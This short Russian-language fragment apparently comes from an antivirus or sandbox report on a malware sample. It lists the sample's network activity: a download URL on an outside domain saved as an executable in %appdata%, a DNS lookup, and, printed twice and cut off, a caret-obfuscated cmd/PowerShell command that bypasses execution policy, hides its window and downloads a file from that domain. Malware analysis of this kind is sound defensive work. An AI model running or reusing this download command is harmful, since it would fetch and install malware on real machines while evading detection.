Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowERs^He^L^L.e^XE -^E^x^ECuTionPo^LI^c^y b^y^P^As^s -^N^oProF^iLE -WINdOWstYLe^ hIdden ^(New^-^obJE^c^t SY^sT^em.neT^.We^b^c^lIE^nT).d^o^WnLOadFile(^'http://transporingsytw.wang/se...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "PowERs^He^L^L.e^XE -^E^x^ECuTionPo^LI^c^y b^y^P^As^s -^N^oProF^iLE -WINdOWstYLe^ hIdden ^(New^-^obJE^c^t SY^sT^em.neT^.We^b^c^lIE^nT).d^o^WnLOadFile(^'http://transporingsytw.wang/se...' (со скрытым окном)